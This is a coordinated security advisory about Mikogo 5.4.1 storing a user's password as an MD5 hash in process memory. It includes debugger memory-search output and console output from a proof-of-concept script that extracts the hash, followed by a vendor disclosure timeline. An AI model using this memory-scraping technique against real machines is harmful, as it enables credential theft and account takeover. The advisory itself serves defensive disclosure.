← Advisories

Mikogo 5.4.1.160608 Local Credentials Disclosure

Medium
Advisory ID
ZSL-2017-5439
Release Date
23 October 2017
Vendor
Snapview GmbH - https://www.mikogo.com
Affected Version
5.4.1.160608
CVE
N/A
Tested On
Microsoft Windows 7 Professional SP1 (EN)
Summary

Mikogo is a desktop sharing software application for web conferencing and remote support, and is provided by the online collaboration provider, BeamYourScreen GmbH. Mikogo provides its software as native downloads for Windows, Mac OS X, Linux, iOS and Android.

Description

Mikogo is vulnerable to local credentials disclosure, the supplied password is stored as a MD5 hash format in memory process. A potential attacker could reveal the supplied password hash and re-use it or store it via the configuration file in order to gain access to the account.

0:017> s -a 0 L?80000000 "password=" 0125cdad 70 61 73 73 77 6f 72 64-3d 00 00 26 6c 61 6e 67 password=..⟨ 0146e6b8 70 61 73 73 77 6f 72 64-3d 00 00 00 64 6f 6d 61 password=...doma 06a422b3 70 61 73 73 77 6f 72 64-3d 34 42 33 42 38 37 34 password=482C811 0:017> da 06a422b3 06a422b3 "password=482C811DA5D5B4BC6D497FF" 06a422d3 "A98491E38...." ... ... C:\Users\Charlie\Desktop>python mikogo_mem.py [~] Searching for pid by process name 'Mikogo-host.exe'.. [+] Found process with pid #1116 [~] Trying to read memory for pid #1116 [+] Credentials found! ---------------------------------------- [+] MD5 Password: 482C811DA5D5B4BC6D497FFA98491E38
Proof of Concept
mikogo_mem.pyTXT
Disclosure Timeline
03.07.2017Vulnerability discovered.
12.07.2017Vendor contacted.
12.07.2017Vendor responds asking more details.
12.07.2017Sent details to the vendor.
13.07.2017Vendor is investigating the issue.
31.07.2017Asked vendor for status update.
01.08.2017Vendor responds confirming the issue, planning to improve the way they store authentication information in their configuration file and how it is computed in the systems memory. Plans to release a fix together with further improvements in version 5.7.x within the next three months.
01.08.2017Replied to the vendor.
14.08.2017Asked vendor for status update.
26.08.2017No response from the vendor.
27.08.2017Asked vendor for status update.
29.08.2017Vendor responds, they are in finalization phase containing quality assurance and infrastructure preparations. Plans to release latest in November.
23.10.2017Vendor releases version 5.9.0 to address this issue.
23.10.2017Coordinated public security advisory released.
Credits
Vulnerability discovered by Gjoko Krstic
References
[1]https://www.mikogo.com/2017/10/23/new-mikogo-release/
[2]https://mikogo.zendesk.com/hc/en-us/articles/200453033-Release-Notes
[3]https://www.exploit-db.com/exploits/43033/
[4]https://exchange.xforce.ibmcloud.com/vulnerabilities/134057
[5]https://packetstormsecurity.com/files/144715
[6]https://cxsecurity.com/issue/WLB-2017100181
Changelog
23.10.2017Initial release
26.10.2017Added reference [3], [4], [5] and [6]